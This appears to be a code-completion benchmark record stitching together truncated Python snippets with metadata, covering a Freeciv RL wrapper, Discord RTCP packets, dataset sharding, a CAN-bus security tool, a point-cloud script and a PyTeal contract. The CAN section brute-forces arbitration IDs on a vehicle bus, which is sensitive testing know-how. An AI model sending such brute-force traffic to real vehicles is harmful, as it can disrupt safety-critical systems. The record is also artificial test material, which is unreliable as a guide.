"snippet": "class Wrapper(gymnasium.Wrapper):\n def reset(self, *, seed=None, options=None, **kwargs):\n return self.env.reset(seed=seed, options=options, **kwargs)"
},
{
"identifier": "onehotifier_maker",
... | import numpy as np
from civrealm.envs import FreecivBaseEnv
from civrealm.envs.freeciv_wrapper.config import default_tensor_config
from .core import Wrapper
from .utils import onehotifier_maker | 1,273 |
class TensorBase(Wrapper):
"""
A basic wrapper that deals with config loading and entity id recording,
required by all tensor-related wrappers.
Parameters
----------
env: FreecivBaseEnv
config: dict
tensor env configuration
Attributes
---------
config: dict
A dict that specifies all configurations related to tensor wrapper.
my_player_id: int
My player id.
unit_ids: list
A sorted list of my unit ids.
city_ids: list
A sorted list of my city ids.
others_unit_ids: list
A sorted list of others unit ids.
others_city_ids: list
A sorted list of others city ids.
dipl_ids : list
A list of others player ids.
units : dict
ruleset information about units.
unit_types :list
A list of all unit types.
unit_costs : list
A list of int indicating unit costs.
improvements : dict
Ruleset information about city improvements.
impr_costs :list
A list of int indicating city improvements costs.
"""
def __init__(self, env: FreecivBaseEnv, config: dict = default_tensor_config):
self.config = config
self.my_player_id = -1
# mutable ids
self.unit_ids = []
self.city_ids = []
self.others_unit_ids = []
self.others_city_ids = []
self.dipl_ids = []
# ruleset
self.units = {}
self.unit_types = []
self.unit_costs = []
self.improvements = {}
self.impr_costs = []
super().__init__(env)
def update_sequence_ids(self, observation):
"""
Use city, unit and dipl information in observation to update ids.
"""
self.unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] == self.my_player_id
)
)
self.others_unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] != self.my_player_id
)
)
self.city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] == self.my_player_id
)
)
self.others_city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] != self.my_player_id
)
)
self.dipl_ids = [
player
for player in sorted(observation.get("dipl", {}).keys())
if player != self.my_player_id
]
def update_config(self):
"""
Update config using ruleset information at the start of the turn.
"""
self.units = self.unwrapped.civ_controller.rule_ctrl.unit_types
self.unit_types = [self.units[i]["name"] for i in range(len(self.units))]
self.unit_costs = [self.units[i]["build_cost"] for i in range(len(self.units))]
self.improvements = self.unwrapped.civ_controller.rule_ctrl.improvements
self.impr_costs = [
self.improvements[i]["build_cost"] for i in range(len(self.improvements))
]
|
class TensorBase(Wrapper):
"""
A basic wrapper that deals with config loading and entity id recording,
required by all tensor-related wrappers.
Parameters
----------
env: FreecivBaseEnv
config: dict
tensor env configuration
Attributes
---------
config: dict
A dict that specifies all configurations related to tensor wrapper.
my_player_id: int
My player id.
unit_ids: list
A sorted list of my unit ids.
city_ids: list
A sorted list of my city ids.
others_unit_ids: list
A sorted list of others unit ids.
others_city_ids: list
A sorted list of others city ids.
dipl_ids : list
A list of others player ids.
units : dict
ruleset information about units.
unit_types :list
A list of all unit types.
unit_costs : list
A list of int indicating unit costs.
improvements : dict
Ruleset information about city improvements.
impr_costs :list
A list of int indicating city improvements costs.
"""
def __init__(self, env: FreecivBaseEnv, config: dict = default_tensor_config):
self.config = config
self.my_player_id = -1
# mutable ids
self.unit_ids = []
self.city_ids = []
self.others_unit_ids = []
self.others_city_ids = []
self.dipl_ids = []
# ruleset
self.units = {}
self.unit_types = []
self.unit_costs = []
self.improvements = {}
self.impr_costs = []
super().__init__(env)
def update_sequence_ids(self, observation):
"""
Use city, unit and dipl information in observation to update ids.
"""
self.unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] == self.my_player_id
)
)
self.others_unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] != self.my_player_id
)
)
self.city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] == self.my_player_id
)
)
self.others_city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] != self.my_player_id
)
)
self.dipl_ids = [
player
for player in sorted(observation.get("dipl", {}).keys())
if player != self.my_player_id
]
def update_config(self):
"""
Update config using ruleset information at the start of the turn.
"""
self.units = self.unwrapped.civ_controller.rule_ctrl.unit_types
self.unit_types = [self.units[i]["name"] for i in range(len(self.units))]
self.unit_costs = [self.units[i]["build_cost"] for i in range(len(self.units))]
self.improvements = self.unwrapped.civ_controller.rule_ctrl.improvements
self.impr_costs = [
self.improvements[i]["build_cost"] for i in range(len(self.improvements))
] | self.config["obs_ops"]["unit"]["type_rule_name"] = onehotifier_maker( | 1 | 2023-11-18 19:35:50+00:00 | 2k |
Sheppsu/discord-ext-listening | discord/ext/listening/sink.py | [
{
"identifier": "RTCPMessageType",
"path": "discord/ext/listening/enums.py",
"snippet": "class RTCPMessageType(Enum):\n sender_report = 200\n receiver_report = 201\n source_description = 202\n goodbye = 203\n application_defined = 204"
},
{
"identifier": "Decoder",
"path": "di... | import asyncio
import logging
import os
import queue
import struct
import subprocess
import threading
import wave
from collections import defaultdict
from dataclasses import dataclass
from time import monotonic
from typing import TYPE_CHECKING, Any, BinaryIO, Callable, Dict, List, Optional, Sequence, Tuple, Union
from discord.errors import ClientException
from discord.object import Object
from discord.player import CREATE_NO_WINDOW
from .enums import RTCPMessageType
from .opus import Decoder as OpusDecoder
from discord.member import Member | 1,343 | c: :class:`int`
The total number of RTP data packets from source SSRC that have
been lost since the beginning of reception.
ehsn: :class:`int`
The low 16 bits contain the highest sequence number received in an RTP
data packet from source SSRC, and the most significant 16 bits extend
that sequence number with the corresponding count of sequence number cycles.
j: :class:`int`
An estimate of the statistical variance of the RTP data packet interarrival
time, measured in timestamp units and expressed as an unsigned integer.
lsr: :class:`int`
The middle 32 bits out of 64 in the NTP timestamp received as part of the most
recent RTCP sender report (SR) packet from source SSRC. If no SR has been
received yet, the field is set to zero.
dlsr: :class:`int`
The delay, expressed in units of 1/65536 seconds, between receiving the last
SR packet from source SSRC and sending this reception report block. If no
SR packet has been received yet from SSRC, the DLSR field is set to zero.
"""
__slots__ = (
"ssrc",
"f",
"c",
"ehsn",
"j",
"lsr",
"dlsr",
)
ssrc: int
f: int
c: int
ehsn: int
j: int
lsr: int
dlsr: int
@dataclass
class RTCPSourceDescriptionItem:
"""An item of a :class:`RTCPSourceDescriptionChunk` object
Attributes
----------
cname: :class:`int`
Type of description.
description: :class:`bytes`
Description pertaining to the source of the chunk containing this item.
"""
__slots__ = (
"cname",
"description",
)
cname: int
description: bytes
@dataclass
class RTCPSourceDescriptionChunk:
"""A chunk of a :class:`RTCPSourceDescriptionPacket` object.
Contains items that describe a source.
Attributes
----------
ssrc: :class:`int`
The source which is being described.
items: Sequence[:class:`RTCPSourceDescriptionItem`]
A sequence of items which have a description.
"""
__slots__ = (
"ssrc",
"items",
)
ssrc: int
items: Sequence[RTCPSourceDescriptionItem]
class RTCPPacket:
"""Base class for all RTCP packet classes. Contains header attributes.
Read in detail here: https://www.freesoft.org/CIE/RFC/1889/19.htm
Attributes
----------
v: :class:`int`
Identifies the version of RTP, which is the same in RTCP packets
as in RTP data packets.
p: :class:`bool`
If the padding bit is set, this RTCP packet contains some additional
padding octets at the end which are not part of the control information.
The last octet of the padding is a count of how many padding octets
should be ignored.
rc: :class:`int`
Indicates the number of "items" within a packet. For sender and receiver
packets it indicates the number of Receiver Report Blocks.
pt: :class:`RTCPMessageType`
Indicates the RTCP packet type.
l: :class:`int`
The length of this RTCP packet in 32-bit words minus one, including
the header and any padding.
"""
__slots__ = (
"v",
"p",
"rc",
"pt",
"l",
)
if TYPE_CHECKING:
v: int
p: bool
rc: int
|
if TYPE_CHECKING:
__all__ = (
"AudioFrame",
"AudioSink",
"AudioHandlingSink",
"AudioFileSink",
"AudioFile",
"WaveAudioFile",
"MP3AudioFile",
"RTCPPacket",
"RTCPSenderReportPacket",
"RTCPReceiverReportPacket",
"RTCPSourceDescriptionPacket",
"RTCPGoodbyePacket",
"RTCPApplicationDefinedPacket",
"RTCPReceiverReportBlock",
"RTCPSourceDescriptionChunk",
"RTCPSourceDescriptionItem",
)
SILENT_FRAME = b"\xf8\xff\xfe"
_log = logging.getLogger(__name__)
@dataclass
class RTCPReceiverReportBlock:
"""Receiver report block from :class:`RTCPSenderReportPacket`
or :class:`RTCPReceiverReportPacket`
Conveys statistics on the reception of RTP packets from a single synchronization source.
Read in detail here: https://www.freesoft.org/CIE/RFC/1889/19.htm
Attributes
----------
ssrc: :class:`int`
The SSRC identifier of the source to which the information in this
reception report block pertains.
f: :class:`int`
The fraction of RTP data packets from source SSRC lost since the
previous SR or RR packet was sent.
c: :class:`int`
The total number of RTP data packets from source SSRC that have
been lost since the beginning of reception.
ehsn: :class:`int`
The low 16 bits contain the highest sequence number received in an RTP
data packet from source SSRC, and the most significant 16 bits extend
that sequence number with the corresponding count of sequence number cycles.
j: :class:`int`
An estimate of the statistical variance of the RTP data packet interarrival
time, measured in timestamp units and expressed as an unsigned integer.
lsr: :class:`int`
The middle 32 bits out of 64 in the NTP timestamp received as part of the most
recent RTCP sender report (SR) packet from source SSRC. If no SR has been
received yet, the field is set to zero.
dlsr: :class:`int`
The delay, expressed in units of 1/65536 seconds, between receiving the last
SR packet from source SSRC and sending this reception report block. If no
SR packet has been received yet from SSRC, the DLSR field is set to zero.
"""
__slots__ = (
"ssrc",
"f",
"c",
"ehsn",
"j",
"lsr",
"dlsr",
)
ssrc: int
f: int
c: int
ehsn: int
j: int
lsr: int
dlsr: int
@dataclass
class RTCPSourceDescriptionItem:
"""An item of a :class:`RTCPSourceDescriptionChunk` object
Attributes
----------
cname: :class:`int`
Type of description.
description: :class:`bytes`
Description pertaining to the source of the chunk containing this item.
"""
__slots__ = (
"cname",
"description",
)
cname: int
description: bytes
@dataclass
class RTCPSourceDescriptionChunk:
"""A chunk of a :class:`RTCPSourceDescriptionPacket` object.
Contains items that describe a source.
Attributes
----------
ssrc: :class:`int`
The source which is being described.
items: Sequence[:class:`RTCPSourceDescriptionItem`]
A sequence of items which have a description.
"""
__slots__ = (
"ssrc",
"items",
)
ssrc: int
items: Sequence[RTCPSourceDescriptionItem]
class RTCPPacket:
"""Base class for all RTCP packet classes. Contains header attributes.
Read in detail here: https://www.freesoft.org/CIE/RFC/1889/19.htm
Attributes
----------
v: :class:`int`
Identifies the version of RTP, which is the same in RTCP packets
as in RTP data packets.
p: :class:`bool`
If the padding bit is set, this RTCP packet contains some additional
padding octets at the end which are not part of the control information.
The last octet of the padding is a count of how many padding octets
should be ignored.
rc: :class:`int`
Indicates the number of "items" within a packet. For sender and receiver
packets it indicates the number of Receiver Report Blocks.
pt: :class:`RTCPMessageType`
Indicates the RTCP packet type.
l: :class:`int`
The length of this RTCP packet in 32-bit words minus one, including
the header and any padding.
"""
__slots__ = (
"v",
"p",
"rc",
"pt",
"l",
)
if TYPE_CHECKING:
v: int
p: bool
rc: int | pt: RTCPMessageType | 0 | 2023-11-15 00:16:36+00:00 | 2k |
RAIVNLab/MatFormer-OLMo | olmo/data/iterable_dataset.py | [
{
"identifier": "PathOrStr",
"path": "olmo/aliases.py",
"snippet": ""
},
{
"identifier": "barrier",
"path": "olmo/util.py",
"snippet": "def barrier() -> None:\n if dist.is_available() and dist.is_initialized():\n dist.barrier()"
},
{
"identifier": "get_global_rank",
... | import logging
import math
import numpy as np
import torch
import torch.utils.data
from pathlib import Path
from typing import Any, Dict, Iterator, List, Optional, Sequence, Union
from ..aliases import PathOrStr
from ..util import barrier, get_global_rank, get_world_size | 803 |
__all__ = ["IterableDataset"]
log = logging.getLogger(__name__)
class IterableDataset(torch.utils.data.IterableDataset[Dict[str, Any]]):
"""
Adapted from PyTorch's DistributedSampler, this wraps a Dataset or arbitrary sequence
as an IterableDataset that can be deterministically restarted at any point by setting `start_index`,
which should be a multiple of your global batch size.
Similarly `max_examples`, if set, should be a multiple of global batch size.
"""
def __init__(
self,
dataset: Union[Sequence[List[int]], Sequence[torch.Tensor], Sequence[Dict[str, Any]]],
*,
seed: int = 0,
start_index: int = 0,
max_examples: Optional[int] = None,
shuffle: bool = True,
drop_last: bool = False,
world_size: Optional[int] = None,
rank: Optional[int] = None,
work_dir: Optional[PathOrStr] = None,
):
self.dataset = dataset
self.seed = seed
self.start_index = start_index
self.max_examples = max_examples
self.shuffle = shuffle
self.drop_last = drop_last
self.rank = rank if rank is not None else get_global_rank()
self.world_size = world_size if world_size is not None else get_world_size()
# If the dataset length is evenly divisible by # of replicas, then there
# is no need to drop any data, since the dataset will be split equally.
if self.drop_last and len(self.dataset) % self.world_size != 0: # type: ignore[arg-type]
# Split to nearest available length that is evenly divisible by world size.
# This is to ensure each rank receives the same amount of data.
num_samples = math.ceil(
(len(self.dataset) - self.world_size) / self.world_size # type: ignore[arg-type]
)
else:
num_samples = math.ceil(len(self.dataset) / self.world_size) # type: ignore[arg-type]
self.total_size = num_samples * self.world_size
self.global_indices_file: Optional[Path] = None
if work_dir is not None:
self.global_indices_file = Path(work_dir) / "global_indices.npy"
if self.rank == 0:
log.info("Saving global data order indices...")
self.global_indices_file.parent.mkdir(parents=True, exist_ok=True)
global_indices = self._build_global_indices()
global_indices_mmap = np.memmap(
self.global_indices_file, dtype=np.uint64, mode="w+", shape=(len(global_indices),)
)
global_indices_mmap[:] = global_indices
global_indices_mmap.flush()
del global_indices_mmap
log.info("Global data order indices saved to '%s'", self.global_indices_file)
|
__all__ = ["IterableDataset"]
log = logging.getLogger(__name__)
class IterableDataset(torch.utils.data.IterableDataset[Dict[str, Any]]):
"""
Adapted from PyTorch's DistributedSampler, this wraps a Dataset or arbitrary sequence
as an IterableDataset that can be deterministically restarted at any point by setting `start_index`,
which should be a multiple of your global batch size.
Similarly `max_examples`, if set, should be a multiple of global batch size.
"""
def __init__(
self,
dataset: Union[Sequence[List[int]], Sequence[torch.Tensor], Sequence[Dict[str, Any]]],
*,
seed: int = 0,
start_index: int = 0,
max_examples: Optional[int] = None,
shuffle: bool = True,
drop_last: bool = False,
world_size: Optional[int] = None,
rank: Optional[int] = None,
work_dir: Optional[PathOrStr] = None,
):
self.dataset = dataset
self.seed = seed
self.start_index = start_index
self.max_examples = max_examples
self.shuffle = shuffle
self.drop_last = drop_last
self.rank = rank if rank is not None else get_global_rank()
self.world_size = world_size if world_size is not None else get_world_size()
# If the dataset length is evenly divisible by # of replicas, then there
# is no need to drop any data, since the dataset will be split equally.
if self.drop_last and len(self.dataset) % self.world_size != 0: # type: ignore[arg-type]
# Split to nearest available length that is evenly divisible by world size.
# This is to ensure each rank receives the same amount of data.
num_samples = math.ceil(
(len(self.dataset) - self.world_size) / self.world_size # type: ignore[arg-type]
)
else:
num_samples = math.ceil(len(self.dataset) / self.world_size) # type: ignore[arg-type]
self.total_size = num_samples * self.world_size
self.global_indices_file: Optional[Path] = None
if work_dir is not None:
self.global_indices_file = Path(work_dir) / "global_indices.npy"
if self.rank == 0:
log.info("Saving global data order indices...")
self.global_indices_file.parent.mkdir(parents=True, exist_ok=True)
global_indices = self._build_global_indices()
global_indices_mmap = np.memmap(
self.global_indices_file, dtype=np.uint64, mode="w+", shape=(len(global_indices),)
)
global_indices_mmap[:] = global_indices
global_indices_mmap.flush()
del global_indices_mmap
log.info("Global data order indices saved to '%s'", self.global_indices_file) | barrier() | 1 | 2023-11-14 02:24:07+00:00 | 2k |
1in-oos/ccplus | caringcaribou/utils/can_actions.py | [
{
"identifier": "ARBITRATION_ID_MAX",
"path": "caringcaribou/utils/constants.py",
"snippet": "ARBITRATION_ID_MAX = 0x7FF"
},
{
"identifier": "ARBITRATION_ID_MAX_EXTENDED",
"path": "caringcaribou/utils/constants.py",
"snippet": "ARBITRATION_ID_MAX_EXTENDED = 0x18DAFFF1"
},
{
"iden... | from caringcaribou.utils.constants import ARBITRATION_ID_MAX, ARBITRATION_ID_MAX_EXTENDED, ARBITRATION_ID_MIN, BYTE_MAX, BYTE_MIN
from sys import stdout, version_info
import can
import time | 1,521 | if print_results:
time_left = end_time - time.time()
num_matches = len(blacklist)
print("\r{0:> 5.1f} seconds left, {1} found".format(time_left, num_matches), end="")
stdout.flush()
# Receive message
msg = bus.recv(0.1)
if msg is None:
continue
# Classify
if classifier_function(msg):
# Add to blacklist
blacklist.add(msg.arbitration_id)
if print_results:
num_matches = len(blacklist)
print("\r 0.0 seconds left, {0} found".format(num_matches), end="")
if len(blacklist) > 0:
print("\n Detected IDs: {0}".format(" ".join(sorted(list(map(hex, blacklist))))))
else:
print()
return blacklist
class CanActions:
def __init__(self, arb_id=None, notifier_enabled=True):
"""
CanActions constructor
:param arb_id: int default arbitration ID for object or None
:param notifier_enabled: bool indicating whether a notifier for incoming message callbacks should be enabled
"""
self.bus = can.Bus(DEFAULT_INTERFACE)
self.arb_id = arb_id
self.bruteforce_running = False
self.notifier = None
if notifier_enabled:
self.enable_notifier()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.notifier is not None:
self.disable_notifier()
self.bus.shutdown()
def enable_notifier(self):
self.notifier = can.Notifier(self.bus, listeners=[])
def disable_notifier(self):
self.clear_listeners()
# Prevent threading errors by stopping notifier gracefully
self.notifier.stop(NOTIFIER_STOP_DURATION)
self.notifier = None
def add_listener(self, listener):
self.notifier.listeners.append(listener)
def clear_listeners(self):
self.notifier.listeners = []
def set_listener(self, listener):
self.clear_listeners()
self.add_listener(listener)
def send(self, data, arb_id=None, is_extended=None, is_error=False, is_remote=False):
if len(data) > 8:
raise IndexError("Invalid CAN message length: {0}".format(len(data)))
# Fallback to default arbitration ID (self.arb_id) if no other ID is specified
if arb_id is None:
if self.arb_id is None:
raise ValueError("Arbitration ID must be set through either 'arb_id' argument or self.arb_id")
arb_id = self.arb_id
# Force extended flag if it is unspecified and arbitration ID is larger than the standard format allows
if is_extended is None:
is_extended = arb_id > ARBITRATION_ID_MAX
msg = can.Message(arbitration_id=arb_id,
data=data,
is_extended_id=is_extended,
is_error_frame=is_error,
is_remote_frame=is_remote)
self.bus.send(msg)
def bruteforce_arbitration_id(self, data, callback, min_id, max_id,
callback_end=None):
# Set limits
if min_id is None:
min_id = ARBITRATION_ID_MIN
if max_id is None:
if min_id <= ARBITRATION_ID_MAX:
max_id = ARBITRATION_ID_MAX
else:
# If min_id is extended, use an extended default max_id as well
max_id = ARBITRATION_ID_MAX_EXTENDED
# Sanity checks
if min_id > max_id:
if callback_end:
callback_end("Invalid range: min > max")
return
# Start bruteforce
self.bruteforce_running = True
for arb_id in range(min_id, max_id + 1):
self.notifier.listeners = [callback(arb_id)]
# Use standard addressing (11 bits arbitration ID) instead of extended (29 bits) when possible
extended = False
if arb_id > ARBITRATION_ID_MAX:
extended = True
msg = can.Message(arbitration_id=arb_id, data=data, is_extended_id=extended)
self.bus.send(msg)
time.sleep(MESSAGE_DELAY)
# Return if stopped by calling module
if not self.bruteforce_running:
self.clear_listeners()
return
# Callback if bruteforce finished without being stopped
if callback_end:
self.clear_listeners()
callback_end("Bruteforce of range 0x{0:x}-0x{1:x} completed".format(min_id, max_id))
| from __future__ import print_function
# Handle large ranges efficiently in both python 2 and 3
if version_info[0] == 2:
range = xrange
MESSAGE_DELAY = 0.1
DELAY_STEP = 0.02
NOTIFIER_STOP_DURATION = 0.5
# Global CAN interface setting, which can be set through the -i flag to cc.py
# The value None corresponds to the default CAN interface (typically can0)
DEFAULT_INTERFACE = None
def auto_blacklist(bus, duration, classifier_function, print_results):
"""Listens for false positives on the CAN bus and generates an arbitration ID blacklist.
Finds all can.Message <msg> on 'bus' where 'classifier_function(msg)' evaluates to True.
Terminates after 'duration' seconds and returns a set of all matching arbitration IDs.
Prints progress, time countdown and list of results if 'print_results' is True.
:param bus: CAN bus instance
:param duration: duration in seconds
:param classifier_function: function which, when called upon a can.Message instance,
returns a bool indicating if it should be blacklisted
:param print_results: whether progress and results should be printed to stdout
:type bus: can.Bus
:type duration: float
:type classifier_function: function
:type print_results: bool
:return set of matching arbitration IDs to blacklist
:rtype set(int)
"""
if print_results:
print("Scanning for arbitration IDs to blacklist")
blacklist = set()
start_time = time.time()
end_time = start_time + duration
while time.time() < end_time:
if print_results:
time_left = end_time - time.time()
num_matches = len(blacklist)
print("\r{0:> 5.1f} seconds left, {1} found".format(time_left, num_matches), end="")
stdout.flush()
# Receive message
msg = bus.recv(0.1)
if msg is None:
continue
# Classify
if classifier_function(msg):
# Add to blacklist
blacklist.add(msg.arbitration_id)
if print_results:
num_matches = len(blacklist)
print("\r 0.0 seconds left, {0} found".format(num_matches), end="")
if len(blacklist) > 0:
print("\n Detected IDs: {0}".format(" ".join(sorted(list(map(hex, blacklist))))))
else:
print()
return blacklist
class CanActions:
def __init__(self, arb_id=None, notifier_enabled=True):
"""
CanActions constructor
:param arb_id: int default arbitration ID for object or None
:param notifier_enabled: bool indicating whether a notifier for incoming message callbacks should be enabled
"""
self.bus = can.Bus(DEFAULT_INTERFACE)
self.arb_id = arb_id
self.bruteforce_running = False
self.notifier = None
if notifier_enabled:
self.enable_notifier()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.notifier is not None:
self.disable_notifier()
self.bus.shutdown()
def enable_notifier(self):
self.notifier = can.Notifier(self.bus, listeners=[])
def disable_notifier(self):
self.clear_listeners()
# Prevent threading errors by stopping notifier gracefully
self.notifier.stop(NOTIFIER_STOP_DURATION)
self.notifier = None
def add_listener(self, listener):
self.notifier.listeners.append(listener)
def clear_listeners(self):
self.notifier.listeners = []
def set_listener(self, listener):
self.clear_listeners()
self.add_listener(listener)
def send(self, data, arb_id=None, is_extended=None, is_error=False, is_remote=False):
if len(data) > 8:
raise IndexError("Invalid CAN message length: {0}".format(len(data)))
# Fallback to default arbitration ID (self.arb_id) if no other ID is specified
if arb_id is None:
if self.arb_id is None:
raise ValueError("Arbitration ID must be set through either 'arb_id' argument or self.arb_id")
arb_id = self.arb_id
# Force extended flag if it is unspecified and arbitration ID is larger than the standard format allows
if is_extended is None:
is_extended = arb_id > ARBITRATION_ID_MAX
msg = can.Message(arbitration_id=arb_id,
data=data,
is_extended_id=is_extended,
is_error_frame=is_error,
is_remote_frame=is_remote)
self.bus.send(msg)
def bruteforce_arbitration_id(self, data, callback, min_id, max_id,
callback_end=None):
# Set limits
if min_id is None:
min_id = ARBITRATION_ID_MIN
if max_id is None:
if min_id <= ARBITRATION_ID_MAX:
max_id = ARBITRATION_ID_MAX
else:
# If min_id is extended, use an extended default max_id as well
max_id = ARBITRATION_ID_MAX_EXTENDED
# Sanity checks
if min_id > max_id:
if callback_end:
callback_end("Invalid range: min > max")
return
# Start bruteforce
self.bruteforce_running = True
for arb_id in range(min_id, max_id + 1):
self.notifier.listeners = [callback(arb_id)]
# Use standard addressing (11 bits arbitration ID) instead of extended (29 bits) when possible
extended = False
if arb_id > ARBITRATION_ID_MAX:
extended = True
msg = can.Message(arbitration_id=arb_id, data=data, is_extended_id=extended)
self.bus.send(msg)
time.sleep(MESSAGE_DELAY)
# Return if stopped by calling module
if not self.bruteforce_running:
self.clear_listeners()
return
# Callback if bruteforce finished without being stopped
if callback_end:
self.clear_listeners()
callback_end("Bruteforce of range 0x{0:x}-0x{1:x} completed".format(min_id, max_id))
| def bruteforce_data(self, data, bruteforce_index, callback, min_value=BYTE_MIN, max_value=BYTE_MAX, | 3 | 2023-11-13 05:05:46+00:00 | 2k |
L1bra1/WeakMotion | predict_FGBG_mask.py | [
{
"identifier": "PreSegNet",
"path": "weak_model.py",
"snippet": "class PreSegNet(nn.Module):\n def __init__(self, FGBG_category_num=2, height_feat_size=13):\n super(PreSegNet, self).__init__()\n\n self.FGBG_classify = FGBGEstimation(motion_category_num=FGBG_category_num)\n self.... | import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import time
import sys
import argparse
import os
from weak_model import PreSegNet
from data.weak_utils import remove_close, filter_pc, convert_semantic_to_FGBG, gen_voxel_indices_for_pc, convert_semantic_to_FGBG_waymo
from sklearn.metrics import confusion_matrix
from tqdm import tqdm | 1,233 |
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
height_feat_size = 13 # The size along the height dimension
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default='/path_to/nuScenes/weak-data/train', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('-s', '--save_FB', default='/path_to/nuScenes/FGBG-data/', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--datatype', default='nuScenes', type=str, choices=['Waymo', 'nuScenes'])
parser.add_argument('--pretrained', default='pretrained/nuscenes_seg_0-01.pth', type=str)
parser.add_argument('--gpu', default='0')
args = parser.parse_args()
print(args)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
datatype = args.datatype
def main():
# Specify gpu device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
device_num = torch.cuda.device_count()
print("device number", device_num)
voxel_size = (0.25, 0.25, 0.4)
if datatype == 'nuScenes':
area_extents = np.array([[-32., 32.], [-32., 32.], [-3., 2.]])
elif datatype == 'Waymo':
area_extents = np.array([[-32., 32.], [-32., 32.], [-1., 4.]])
dims = (256, 256, 13)
|
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
height_feat_size = 13 # The size along the height dimension
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default='/path_to/nuScenes/weak-data/train', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('-s', '--save_FB', default='/path_to/nuScenes/FGBG-data/', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--datatype', default='nuScenes', type=str, choices=['Waymo', 'nuScenes'])
parser.add_argument('--pretrained', default='pretrained/nuscenes_seg_0-01.pth', type=str)
parser.add_argument('--gpu', default='0')
args = parser.parse_args()
print(args)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
datatype = args.datatype
def main():
# Specify gpu device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
device_num = torch.cuda.device_count()
print("device number", device_num)
voxel_size = (0.25, 0.25, 0.4)
if datatype == 'nuScenes':
area_extents = np.array([[-32., 32.], [-32., 32.], [-3., 2.]])
elif datatype == 'Waymo':
area_extents = np.array([[-32., 32.], [-32., 32.], [-1., 4.]])
dims = (256, 256, 13)
| model = PreSegNet(FGBG_category_num=2, height_feat_size=height_feat_size) | 0 | 2023-11-12 07:03:29+00:00 | 2k |
c3exchange/c3-smartcontracts-v1 | contracts_unified/core/state_handler/global_handler.py | [
{
"identifier": "InstrumentId",
"path": "contracts_unified/library/c3types.py",
"snippet": "class SignedInstrumentAmount(abi.NamedTuple):\nclass LiquidationFactors(abi.NamedTuple):\nclass InstrumentListElement(abi.NamedTuple):\nclass UserInstrumentData(abi.NamedTuple):\nclass OnChainOrderData(abi.NamedT... | from typing import cast
from pyteal import (
ABIReturnSubroutine,
App,
Assert,
Btoi,
Bytes,
Expr,
Global,
Int,
Len,
MinBalance,
Pop,
Seq,
abi,
)
from contracts_unified.library.c3types import (
InstrumentId,
InstrumentListElement,
LiquidationFactors,
)
from contracts_unified.library.constants import ADDRESS_SIZE | 1,428 |
@staticmethod
def set_pricecaster_id(pricecaster_id) -> Expr:
"""Sets the App id of the pricecaster"""
return App.globalPut(KEY_PRICECASTER_ID, Btoi(pricecaster_id))
@staticmethod
def get_wormhole_bridge_id() -> Expr:
"""Gets the App id of the wormhole bridge"""
return App.globalGet(KEY_WORMHOLE_BRIDGE_ID)
@staticmethod
def set_wormhole_bridge_id(wormhole_bridge_id) -> Expr:
"""Sets the App id of the wormhole bridge"""
return App.globalPut(KEY_WORMHOLE_BRIDGE_ID, Btoi(wormhole_bridge_id))
@staticmethod
@ABIReturnSubroutine
def set_address(key, address) -> Expr:
"""Sets an address in the global storage checking the length"""
return Seq(
Assert(Len(address) == Int(ADDRESS_SIZE)),
App.globalPut(key, address)
)
@staticmethod
def get_signature_validator() -> Expr:
"""Checks the address of the signature validator"""
return App.globalGet(KEY_SIGNATURE_VALIDATOR)
@staticmethod
def set_signature_validator(signature_validator) -> Expr:
"""Sets the address of the signature validator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_SIGNATURE_VALIDATOR, signature_validator))
@staticmethod
def get_operator_address() -> Expr:
"""Gets the address of the operator"""
return App.globalGet(KEY_OPERATOR_ADDRESS)
@staticmethod
def set_operator_address(operator_address) -> Expr:
"""Sets the address of the operator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_OPERATOR_ADDRESS, operator_address))
@staticmethod
def get_quant_address() -> Expr:
"""Gets the quant address"""
return App.globalGet(KEY_QUANT_ADDRESS)
@staticmethod
def set_quant_address(quant_address) -> Expr:
"""Sets the quant address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_QUANT_ADDRESS, quant_address))
@staticmethod
def get_fee_target() -> Expr:
"""Gets the fee target address"""
return App.globalGet(KEY_FEE_TARGET)
@staticmethod
def set_fee_target(fee_target_address) -> Expr:
"""Sets the fee target address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_FEE_TARGET, fee_target_address))
@staticmethod
def get_withdraw_buffer() -> Expr:
"""Gets the withdraw buffer address"""
return App.globalGet(KEY_WITHDRAW_BUFFER)
@staticmethod
def set_withdraw_buffer(withdraw_buffer) -> Expr:
"""Sets the withdraw buffer address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_WITHDRAW_BUFFER, withdraw_buffer))
@staticmethod
@ABIReturnSubroutine
def ensure_mbr_fund() -> Expr:
"""Ensures the current mbr is lower than the fund"""
return Assert(MinBalance(Global.current_application_address()) <= App.globalGet(KEY_MBR_FUND))
@staticmethod
def add_mbr_fund(mbr_fund) -> Expr:
"""Increments the mbr fund amount by an amount"""
